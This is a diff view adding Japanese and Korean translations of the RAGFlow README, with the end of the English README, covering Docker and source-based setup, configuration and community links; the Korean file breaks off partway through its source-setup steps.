251
+ $ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
252
+ ```
253
+
254
+ 3. Copy the entry script and configure environment variables:
255
+
256
+ ```bash
257
+ # Get the Python path:
258
+ $ which python
259
+ # Get the ragflow project path:
260
+ $ pwd
261
+ ```
262
+
263
+ ```bash
264
+ $ cp docker/entrypoint.sh .
265
+ $ vi entrypoint.sh
266
+ ```
267
+
268
+ ```bash
269
+ # Adjust configurations according to your actual situation (the following two export commands are newly added):
270
+ # - Assign the result of `which python` to `PY`.
271
+ # - Assign the result of `pwd` to `PYTHONPATH`.
272
+ # - Comment out `LD_LIBRARY_PATH`, if it is configured.
273
+ # - Optional: Add Hugging Face mirror.
274
+ PY=${PY}
275
+ export PYTHONPATH=${PYTHONPATH}
276
+ export HF_ENDPOINT=https://hf-mirror.com
277
+ ```
278
+
279
+ 4. Launch the third-party services (MinIO, Elasticsearch, Redis, and MySQL):
280
+
281
+ ```bash
282
+ $ cd docker
283
+ $ docker compose -f docker-compose-base.yml up -d
284
+ ```
285
+
286
+ 5. Check the configuration files, ensuring that:
287
+
288
+ - The settings in **docker/.env** match those in **conf/service_conf.yaml**.
289
+ - The IP addresses and ports for related services in **service_conf.yaml** match the local machine IP and ports exposed by the container.
290
+
291
+ 6. Launch the RAGFlow backend service:
292
+
293
+ ```bash
294
+ $ chmod +x ./entrypoint.sh
295
+ $ bash ./entrypoint.sh
296
+ ```
297
+
298
+ 7. Launch the frontend service:
299
+
300
+ ```bash
301
+ $ cd web
302
+ $ npm install --registry=https://registry.npmmirror.com --force
303
+ $ vim .umirc.ts
304
+ # Update proxy.target to http://127.0.0.1:9380
305
+ $ npm run dev
306
+ ```
307
+
308
+ 8. Deploy the frontend service:
309
+
310
+ ```bash
311
+ $ cd web
312
+ $ npm install --registry=https://registry.npmmirror.com --force
313
+ $ umi build
314
+ $ mkdir -p /ragflow/web
315
+ $ cp -r dist /ragflow/web
316
+ $ apt install nginx -y
317
+ $ cp ../docker/nginx/proxy.conf /etc/nginx
318
+ $ cp ../docker/nginx/nginx.conf /etc/nginx
319
+ $ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
320
+ $ systemctl start nginx
321
+ ```
322
+
323
+ ## 📚 Documentation
324
+
325
+ - [Quickstart](https://ragflow.io/docs/dev/)
326
+ - [User guide](https://ragflow.io/docs/dev/category/user-guides)
327
+ - [References](https://ragflow.io/docs/dev/category/references)
328
+ - [FAQ](https://ragflow.io/docs/dev/faq)
329
+
330
+ ## 📜 Roadmap
331
+
332
+ See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
333
+
334
+ ## 🏄 Community
335
+
336
+ - [Discord](https://discord.gg/4XxujFgUN7)
337
+ - [Twitter](https://twitter.com/infiniflowai)
338
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
339
+
340
+ ## 🙌 Contributing
341
+
342
+ RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.
README_ja.md ADDED
@@ -0,0 +1,289 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_ja.md">日本語</a> |
11
+ <a href="./README_ko.md">한국어</a>
12
+ </p>
13
+
14
+ <p align="center">
15
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
16
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
17
+ </a>
18
+ <a href="https://demo.ragflow.io" target="_blank">
19
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
20
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
21
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen"
22
+ alt="docker pull infiniflow/ragflow:v0.11.0"></a>
23
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
24
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
25
+ </a>
26
+ </p>
27
+
28
+ <h4 align="center">
29
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
30
+ <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
31
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
32
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
33
+ <a href="https://demo.ragflow.io">Demo</a>
34
+ </h4>
35
+
36
+ ## 💡 RAGFlow とは?
37
+
38
+ [RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
39
+
40
+ ## 🎮 Demo
41
+
42
+ デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
43
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
44
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
45
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
46
+ </div>
47
+
48
+
49
+ ## 🔥 最新情報
50
+
51
+ - 2024-09-13 ナレッジベース Q&A の検索モードを追加しました。
52
+ - 2024-09-09 エージェントに医療相談テンプレートを追加しました。
53
+ - 2024-08-22 RAG を介して SQL ステートメントへのテキストをサポートします。
54
+ - 2024-08-02 [graphrag](https://github.com/microsoft/graphrag) からインスピレーションを得た GraphRAG とマインド マップをサポートします。
55
+ - 2024-07-23 音声ファイルの解析をサポートしました。
56
+ - 2024-07-08 [Graph](./agent/README.md) ベースのワークフローをサポート
57
+ - 2024-06-27 Q&A 解析メソッドで Markdown と Docx をサポートし、Docx ファイルから画像を抽出し、Markdown ファイルからテーブルを抽出します。
58
+ - 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。
59
+
60
+
61
+ ## 🌟 主な特徴
62
+
63
+ ### 🍭 **"Quality in, quality out"**
64
+
65
+ - 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
66
+ - 無限のトークンから"干し草の山の中の針"を見つける。
67
+
68
+ ### 🍱 **テンプレートベースのチャンク化**
69
+
70
+ - 知的で解釈しやすい。
71
+ - テンプレートオプションが豊富。
72
+
73
+ ### 🌱 **ハルシネーションが軽減された根拠のある引用**
74
+
75
+ - 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
76
+ - 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
77
+
78
+ ### 🍔 **多様なデータソースとの互換性**
79
+
80
+ - Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。
81
+
82
+ ### 🛀 **自動化された楽な RAG ワークフロー**
83
+
84
+ - 個人から大企業まで対応できる RAG オーケストレーション(orchestration)。
85
+ - カスタマイズ可能な LLM とエンベッディングモデル。
86
+ - 複数の想起と融合された再ランク付け。
87
+ - 直感的な API によってビジネスとの統合がシームレスに。
88
+
89
+ ## 🔎 システム構成
90
+
91
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
92
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
93
+ </div>
94
+
95
+ ## 🎬 初期設定
96
+
97
+ ### 📝 必要条件
98
+
99
+ - CPU >= 4 cores
100
+ - RAM >= 16 GB
101
+ - Disk >= 50 GB
102
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
103
+ > ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
104
+
105
+ ### 🚀 サーバーを起動
106
+
107
+ 1. `vm.max_map_count` >= 262144 であることを確認する:
108
+
109
+ > `vm.max_map_count` の値をチェックするには:
110
+ >
111
+ > ```bash
112
+ > $ sysctl vm.max_map_count
113
+ > ```
114
+ >
115
+ > `vm.max_map_count` が 262144 より大きい値でなければリセットする。
116
+ >
117
+ > ```bash
118
+ > # In this case, we set it to 262144:
119
+ > $ sudo sysctl -w vm.max_map_count=262144
120
+ > ```
121
+ >
122
+ > この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
123
+ >
124
+ > ```bash
125
+ > vm.max_map_count=262144
126
+ > ```
127
+
128
+ 2. リポジトリをクローンする:
129
+
130
+ ```bash
131
+ $ git clone https://github.com/infiniflow/ragflow.git
132
+ ```
133
+
134
+ 3. ビルド済みの Docker イメージをビルドし、サーバーを起動する:
135
+
136
+ ```bash
137
+ $ cd ragflow/docker
138
+ $ chmod +x ./entrypoint.sh
139
+ $ docker compose up -d
140
+ ```
141
+
142
+ > 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.11.0として、上記のコマンドを実行してください。
143
+
144
+ > コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。
145
+
146
+ 4. サーバーを立ち上げた後、サーバーの状態を確認する:
147
+
148
+ ```bash
149
+ $ docker logs -f ragflow-server
150
+ ```
151
+
152
+ _以下の出力は、システムが正常に起動したことを確認するものです:_
153
+
154
+ ```bash
155
+ ____ ______ __
156
+ / __ \ ____ _ ____ _ / ____// /____ _ __
157
+ / /_/ // __ `// __ `// /_ / // __ \| | /| / /
158
+ / _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
159
+ /_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
160
+ /____/
161
+
162
+ * Running on all addresses (0.0.0.0)
163
+ * Running on http://127.0.0.1:9380
164
+ * Running on http://x.x.x.x:9380
165
+ INFO:werkzeug:Press CTRL+C to quit
166
+ ```
167
+ > もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
168
+
169
+ 5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
170
+ > デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
171
+ 6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
172
+
173
+ > 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
174
+
175
+ _これで初期設定完了!ショーの開幕です!_
176
+
177
+ ## 🔧 コンフィグ
178
+
179
+ システムコンフィグに関しては、以下のファイルを管理する必要がある:
180
+
181
+ - [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
182
+ - [service_conf.yaml](./docker/service_conf.yaml): バックエンドのサービスを設定します。
183
+ - [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存している。
184
+
185
+ [.env](./docker/.env) ファイルの変更が [service_conf.yaml](./docker/service_conf.yaml) ファイルの内容と一致していることを確認する必要があります。
186
+
187
+ > [./docker/README](./docker/README.md) ファイルは環境設定とサービスコンフィグの詳細な説明を提供し、[./docker/README](./docker/README.md) ファイルに記載されている全ての環境設定が [service_conf.yaml](./docker/service_conf.yaml) ファイルの対応するコンフィグと一致していることを確認することが義務付けられています。
188
+
189
+ デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。
190
+
191
+ > すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
192
+ >
193
+ > ```bash
194
+ > $ docker-compose up -d
195
+ > ```
196
+
197
+ ## 🛠️ ソースからビルドする
198
+
199
+ ソースからDockerイメージをビルドす��には:
200
+
201
+ ```bash
202
+ $ git clone https://github.com/infiniflow/ragflow.git
203
+ $ cd ragflow/
204
+ $ docker build -t infiniflow/ragflow:v0.11.0 .
205
+ $ cd ragflow/docker
206
+ $ chmod +x ./entrypoint.sh
207
+ $ docker compose up -d
208
+ ```
209
+
210
+ ## 🛠️ ソースコードからサービスを起動する方法
211
+
212
+ ソースコードからサービスを起動する場合は、以下の手順に従ってください:
213
+
214
+ 1. リポジトリをクローンします
215
+ ```bash
216
+ $ git clone https://github.com/infiniflow/ragflow.git
217
+ $ cd ragflow/
218
+ ```
219
+
220
+ 2. 仮想環境を作成します(AnacondaまたはMinicondaがインストールされていることを確認してください)
221
+ ```bash
222
+ $ conda create -n ragflow python=3.11.0
223
+ $ conda activate ragflow
224
+ $ pip install -r requirements.txt
225
+ ```
226
+ CUDAのバージョンが12.0以上の場合、以下の追加コマンドを実行してください:
227
+ ```bash
228
+ $ pip uninstall -y onnxruntime-gpu
229
+ $ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
230
+ ```
231
+
232
+ 3. エントリースクリプトをコピーし、環境変数を設定します
233
+ ```bash
234
+ $ cp docker/entrypoint.sh .
235
+ $ vi entrypoint.sh
236
+ ```
237
+ 以下のコマンドで Python のパスとragflowプロジェクトのパスを取得します:
238
+ ```bash
239
+ $ which python
240
+ $ pwd
241
+ ```
242
+
243
+ `which python` の出力を `PY` の値として、`pwd` の出力を `PYTHONPATH` の値として設定します。
244
+
245
+ `LD_LIBRARY_PATH` が既に設定されている場合は、コメントアウトできます。
246
+
247
+ ```bash
248
+ # 実際の状況に応じて設定を調整してください。以下の二つの export は新たに追加された設定です
249
+ PY=${PY}
250
+ export PYTHONPATH=${PYTHONPATH}
251
+ # オプション:Hugging Face ミラーを追加
252
+ export HF_ENDPOINT=https://hf-mirror.com
253
+ ```
254
+
255
+ 4. 基本サービスを起動します
256
+ ```bash
257
+ $ cd docker
258
+ $ docker compose -f docker-compose-base.yml up -d
259
+ ```
260
+
261
+ 5. 設定ファイルを確認します
262
+ **docker/.env** 内の設定が**conf/service_conf.yaml**内の設定と一致していることを確認してください。**service_conf.yaml**内の関連サービスのIPアドレスとポートは、ローカルマシンのIPアドレスとコンテナが公開するポートに変更する必要があります。
263
+
264
+ 6. サービスを起動します
265
+ ```bash
266
+ $ chmod +x ./entrypoint.sh
267
+ $ bash ./entrypoint.sh
268
+ ```
269
+
270
+ ## 📚 ドキュメンテーション
271
+
272
+ - [Quickstart](https://ragflow.io/docs/dev/)
273
+ - [User guide](https://ragflow.io/docs/dev/category/user-guides)
274
+ - [References](https://ragflow.io/docs/dev/category/references)
275
+ - [FAQ](https://ragflow.io/docs/dev/faq)
276
+
277
+ ## 📜 ロードマップ
278
+
279
+ [RAGFlow ロードマップ 2024](https://github.com/infiniflow/ragflow/issues/162) を参照
280
+
281
+ ## 🏄 コミュニティ
282
+
283
+ - [Discord](https://discord.gg/4XxujFgUN7)
284
+ - [Twitter](https://twitter.com/infiniflowai)
285
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
286
+
287
+ ## 🙌 コントリビュート
288
+
289
+ RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず [コントリビューションガイド](./docs/references/CONTRIBUTING.md)をご覧ください。
README_ko.md ADDED
@@ -0,0 +1,325 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_ja.md">日本語</a> |
11
+ <a href="./README_ko.md">한국어</a> |
12
+ </p>
13
+
14
+ <p align="center">
15
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
16
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
17
+ </a>
18
+ <a href="https://demo.ragflow.io" target="_blank">
19
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
20
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
21
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
22
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
23
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
24
+ </a>
25
+ </p>
26
+
27
+ <h4 align="center">
28
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
29
+ <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
30
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
31
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
32
+ <a href="https://demo.ragflow.io">Demo</a>
33
+ </h4>
34
+
35
+
36
+ ## 💡 RAGFlow란?
37
+
38
+ [RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
39
+
40
+
41
+
42
+ ## 🎮 데모
43
+ 데모를 [https://demo.ragflow.io](https://demo.ragflow.io)에서 실행해 보세요.
44
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
45
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
46
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
47
+ </div>
48
+
49
+
50
+ ## 🔥 업데이트
51
+
52
+ - 2024-09-13 지식베이스 Q&A 검색 모드를 추가합니다.
53
+
54
+ - 2024-09-09 Agent에 의료상담 템플릿을 추가하였습니다.
55
+
56
+ - 2024-08-22 RAG를 통해 SQL 문에 텍스트를 지원합니다.
57
+
58
+ - 2024-08-02: [graphrag](https://github.com/microsoft/graphrag)와 마인드맵에서 영감을 받은 GraphRAG를 지원합니다.
59
+
60
+ - 2024-07-23: 오디오 파일 분석을 지원합니다.
61
+
62
+ - 2024-07-08: [Graph](./agent/README.md)를 기반으로 한 워크플로우를 지원합니다.
63
+
64
+ - 2024-06-27 Q&A 구문 분석 방식에서 Markdown 및 Docx를 지원하고, Docx 파일에서 이미지 추출, Markdown 파일에서 테이블 추출을 지원합니다.
65
+
66
+ - 2024-05-23: 더 나은 텍스트 검색을 위해 [RAPTOR](https://arxiv.org/html/2401.18059v1)를 지원합니다.
67
+
68
+
69
+
70
+ ## 🌟 주요 기능
71
+
72
+ ### 🍭 **"Quality in, quality out"**
73
+ - [심층 문서 이해](./deepdoc/README.md)를 기반으로 복잡한 형식의 비정형 데이터에서 지식을 추출합니다.
74
+ - 문자 그대로 무한한 토큰에서 "데이터 속의 바늘"을 찾아냅니다.
75
+
76
+ ### 🍱 **템플릿 기반의 chunking**
77
+ - 똑똑하고 설명 가능한 방식.
78
+ - 다양한 템플릿 옵션을 제공합니다.
79
+
80
+
81
+ ### 🌱 **할루시네이션을 줄인 신뢰할 수 있는 인용**
82
+ - 텍스트 청킹을 시각화하여 사용자가 개입할 수 있도록 합니다.
83
+ - 중요한 참고 자료와 추적 가능한 인용을 빠르게 확인하여 신뢰할 수 있는 답변을 지원합니다.
84
+
85
+
86
+ ### 🍔 **다른 종류의 데이터 소스와의 호환성**
87
+ - 워드, 슬라이드, 엑셀, 텍스트 파일, 이미지, 스캔본, 구조화된 데이터, 웹 페이지 등을 지원합니다.
88
+
89
+ ### 🛀 **자동화되고 손쉬운 RAG 워크플로우**
90
+ - 개인 및 대규모 비즈니스에 맞춘 효율적인 RAG 오케스트레이션.
91
+ - 구성 가능한 LLM 및 임베딩 모델.
92
+ - 다중 검색과 결합된 re-ranking.
93
+ - 비즈니스와 원활하게 통합할 수 있는 직관적인 API.
94
+
95
+
96
+ ## 🔎 시스템 아키텍처
97
+
98
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
99
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
100
+ </div>
101
+
102
+ ## 🎬 시작하기
103
+ ### 📝 사전 준비 사항
104
+ - CPU >= 4 cores
105
+ - RAM >= 16 GB
106
+ - Disk >= 50 GB
107
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
108
+ > 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치]((https://docs.docker.com/engine/install/))를 참조하세요.
109
+
110
+
111
+ ### 🚀 서버 시작하기
112
+
113
+ 1. `vm.max_map_count`가 262144 이상인지 확인하세요:
114
+ > `vm.max_map_count`의 값을 아래 명령어를 통해 확인하세요:
115
+ >
116
+ > ```bash
117
+ > $ sysctl vm.max_map_count
118
+ > ```
119
+ >
120
+ > 만약 `vm.max_map_count` 이 262144 보다 작다면 값을 쟈설정하세요.
121
+ >
122
+ > ```bash
123
+ > # 이 경우에 262144로 설정했습니다.:
124
+ > $ sudo sysctl -w vm.max_map_count=262144
125
+ > ```
126
+ >
127
+ > 이 변경 사항은 시스템 재부팅 후에 초기화됩니다. 변경 사항을 영구적으로 적용하려면 /etc/sysctl.conf 파일에 vm.max_map_count 값을 추가하거나 업데이트하세요:
128
+ >
129
+ > ```bash
130
+ > vm.max_map_count=262144
131
+ > ```
132
+
133
+ 2. 레포지토리를 클론하세요:
134
+
135
+ ```bash
136
+ $ git clone https://github.com/infiniflow/ragflow.git
137
+ ```
138
+
139
+ 3. 미리 빌드된 Docker 이미지를 생성하고 서버를 시작하세요:
140
+
141
+ > 다음 명령어를 실행하면 *dev* 버전의 RAGFlow Docker 이미지가 자동으로 다운로드됩니다. 특정 Docker 버전을 다운로드하고 실행하려면, **docker/.env** 파일에서 `RAGFLOW_VERSION`을 원하는 버전으로 업데이트한 후, 예를 들어 `RAGFLOW_VERSION=v0.11.0`로 업데이트 한 뒤, 다음 명령어를 실행하세요.
142
+ ```bash
143
+ $ cd ragflow/docker
144
+ $ chmod +x ./entrypoint.sh
145
+ $ docker compose up -d
146
+ ```
147
+
148
+ > 기본 이미지는 약 9GB 크기이며 로드하는 데 시간이 걸릴 수 있습니다.
149
+
150
+
151
+ 4. 서버가 시작된 후 서버 상태를 확인하세요:
152
+
153
+ ```bash
154
+ $ docker logs -f ragflow-server
155
+ ```
156
+
157
+ _다음 출력 결과로 시스템이 성공적으로 시작되었음을 확인합니다:_
158
+
159
+ ```bash
160
+ ____ ______ __
161
+ / __ \ ____ _ ____ _ / ____// /____ _ __
162
+ / /_/ // __ `// __ `// /_ / // __ \| | /| / /
163
+ / _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
164
+ /_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
165
+ /____/
166
+
167
+ * Running on all addresses (0.0.0.0)
168
+ * Running on http://127.0.0.1:9380
169
+ * Running on http://x.x.x.x:9380
170
+ INFO:werkzeug:Press CTRL+C to quit
171
+ ```
172
+ > 만약 확인 단계를 건너뛰고 바로 RAGFlow에 로그인하면, RAGFlow가 완전히 초기화되지 않았기 때문에 브라우저에서 `network abnormal` 오류가 발생할 수 있습니다.
173
+
174
+ 5. 웹 브라우저에 서버의 IP 주소를 입력하고 RAGFlow에 로그인하세요.
175
+ > 기본 설정을 사용할 경우, `http://IP_OF_YOUR_MACHINE`만 입력하면 됩니다 (포트 번호는 제외). 기본 HTTP 서비스 포트 `80`은 기본 구성으로 사용할 때 생략할 수 있습니다.
176
+ 6. [service_conf.yaml](./docker/service_conf.yaml) 파일에서 원하는 LLM 팩토리를 `user_default_llm`에 선택하고, `API_KEY` 필드를 해당 API 키로 업데이트하세요.
177
+ > 자세한 내용은 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)를 참조하세요.
178
+
179
+ _이제 쇼가 시작됩니다!_
180
+
181
+ ## 🔧 설정
182
+
183
+ 시스템 설정과 관련하여 다음 파일들을 관리해야 합니다:
184
+
185
+ - [.env](./docker/.env): `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, `MINIO_PASSWORD`와 같은 시스템의 기본 설정을 포함합니다.
186
+ - [service_conf.yaml](./docker/service_conf.yaml): 백엔드 서비스를 구성합니다.
187
+ - [docker-compose.yml](./docker/docker-compose.yml): 시스템은 [docker-compose.yml](./docker/docker-compose.yml)을 사용하여 시작됩니다.
188
+
189
+ [.env](./docker/.env) 파일의 변경 사항이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 내용과 일치하도록 해야 합니다.
190
+
191
+ > [./docker/README](./docker/README.md) 파일에는 환경 설정과 서비스 구성에 대한 자세한 설명이 있으며, [./docker/README](./docker/README.md) 파일에 나열된 모든 환경 설정이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 해당 구성과 일치하도록 해야 합니다.
192
+
193
+ 기본 HTTP 서비스 포트(80)를 업데이트하려면 [docker-compose.yml](./docker/docker-compose.yml) 파일에서 `80:80`을 `<YOUR_SERVING_PORT>:80`으로 변경하세요.
194
+
195
+ > 모든 시스템 구성 업데이트는 적용되기 위해 시스템 재부팅이 필요합니다.
196
+ >
197
+ > ```bash
198
+ > $ docker-compose up -d
199
+ > ```
200
+
201
+ ## 🛠️ 소스에서 빌드하기
202
+
203
+ Docker 이미지를 소스에서 빌드하려면:
204
+
205
+ ```bash
206
+ $ git clone https://github.com/infiniflow/ragflow.git
207
+ $ cd ragflow/
208
+ $ docker build -t infiniflow/ragflow:dev .
209
+ $ cd ragflow/docker
210
+ $ chmod +x ./entrypoint.sh
211
+ $ docker compose up -d
212
+ ```
213
+
214
+
215
+ ## 🛠️ 소스에서 서비스 시작하기
216
+
217
+ 서비스를 소스에서 시작하려면:
218
+
219
+ 1. 레포지토리를 클론하세요:
220
+
221
+ ```bash
222
+ $ git clone https://github.com/infiniflow/ragflow.git
223
+ $ cd ragflow/
224
+ ```
225
+
226
+ 2. 가상 환경을 생성하고, Anaconda 또는 Miniconda가 설치되어 있는지 확인하세요:
227
+ ```bash
228
+ $ conda create -n ragflow python=3.11.0
229
